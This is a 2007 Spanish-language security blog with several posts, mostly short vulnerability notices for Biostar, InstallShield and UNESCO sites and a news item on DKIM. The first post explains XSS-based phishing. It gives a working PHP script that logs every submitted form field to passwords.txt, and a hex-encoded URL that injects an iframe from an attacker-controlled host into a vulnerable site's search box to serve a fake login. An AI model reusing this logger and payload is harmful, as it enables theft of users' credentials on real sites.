MAYA SOUND

martes, 17 de julio de 2007

Logins forms,XSS enfocado a pishing

Iframes remotos, en combinacion con ficheros html y php, pueden ser usados para que un usuario malintencionado haga el enlace que sirva de portal para robo de credenciales de usuarios en general, basicamente usando casillas de búsqueda vulnerables a XSS

código inyectable.


java script:

">

Capturador de logins forms:


$handle
= fopen("passwords.txt", "a");
foreach(
$_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
exit;
?>

en combinacion con un fichero de texto, codificado en forma hexadecimal y alojados en un host remoto.

http://sitiovulnerable.com/index.php?s=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%68%6F%73%74%64%65%6C%61%74%61%63%61%6E%74%65%2F%69%6E%64%65%78%2E%68%74%6D%6C%22%3E%3C%2F%69%66%72%61%6D%65%3E

un saludo

martes, 12 de junio de 2007

Biostar a la vista

El sitio de la marca Biostar, posee nuevas vulnerabilidades de tipo SQL y XSS, entre otros, es de vital importancia la solucion de este problema, porque de no ser solucionado, cualquier persona mal intencionada puede tomar control.

SQL

XSSacceso a archivos de configuracion


Un Saludo
big sites, big bugs.

jueves, 24 de mayo de 2007

Un salto gigante para la seguridad en Internet

El sistema de Ingenieria en Seguridad de Internet (Internet Engineering Task Force (IETF)) ha aprobado el sistema de correo identificado DomainKeys (DKIM) como estándar propuesto sobre Internet: RFC 4871. Éso significa malas noticias para los spammers, los spoofers, y los phishers por todas partes. DKIM es un marco de autentificación de email que trata la exaustivamente la falsificación del email, usando la criptografía para verificar el dominio del remitente. Permite que los que abastecen el email validen el dominio del que se origina un email, haciendo uso las listas negras y los whitelists más eficaces. También trata el phishing los ataques más fáciles detectar ayudando a identificar dominios abusivos. Críticamente, DKIM es la autentificación desde el nivel del dominio, que hace la adopción global factible. Lo cual significa que los spammers no pueden ocultar su IP.

fuente

http://yodel.yahoo.com/2007/05/22/one-small-step-for-email-one-giant-leap-for-internet-safety/

cheers
un saludo.

miércoles, 16 de mayo de 2007

Inyección SQL en installshield




Installshield, un sistema de instalacion de programas, con bases de datos de usuarios registrados en el sitio y que ahora forma parte de Macrovision, productos como Anywhere y la serie Flex. importante taponear esos bugs, ya reportado!!.

XSS en el portal de la UNESCO




Recientemente he notificado a notificado a Eric, webmaster del portal sobre el problema xss en
el sitio de la unesco, sitios como este es de vital importancia que estén libres de todo bug porque pueden poseer un panel de control, cualquiera pueden tomar ventaja de su cookie y entrar como administrador del sitio.